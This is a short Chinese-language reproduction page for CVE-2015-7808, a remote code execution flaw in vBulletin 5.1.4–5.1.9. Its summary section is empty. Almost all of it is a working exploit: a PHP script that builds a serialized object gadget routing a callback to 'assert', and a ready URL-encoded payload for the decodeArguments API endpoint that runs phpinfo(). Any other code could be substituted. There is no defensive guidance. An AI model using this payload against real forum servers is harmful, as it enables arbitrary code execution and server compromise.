CVE-2015-7808 VBulletin 远程命令执行漏洞¶
一、漏洞简介¶
二、漏洞影响¶
VBulletin VBulletin 5.1.4 - 5.1.9
三、复现过程¶
$ php << 'eof'
<?php
class vB_Database_MySQL{
public $functions = array();
public function __construct()
{
$this->functions['free_result'] = 'assert';
}
}
class vB_dB_Result {
protected $db;
protected $recordset;
public function __construct()
{
$this->db = new vB_Database_MySQL();
$this->recordset = "phpinfo()";
}
}
print urlencode(serialize(new vB_dB_Result())) . "n";
eof
http://url/ajax/api/hook/decodeArguments?arguments=O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2A%00db%22%3BO%3A17%3A%22vB_Database_MySQL%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A6%3A%22assert%22%3B%7D%7Ds%3A12%3A%22%00%2A%00recordset%22%3Bs%3A9%3A%22phpinfo%28%29%22%3B%7D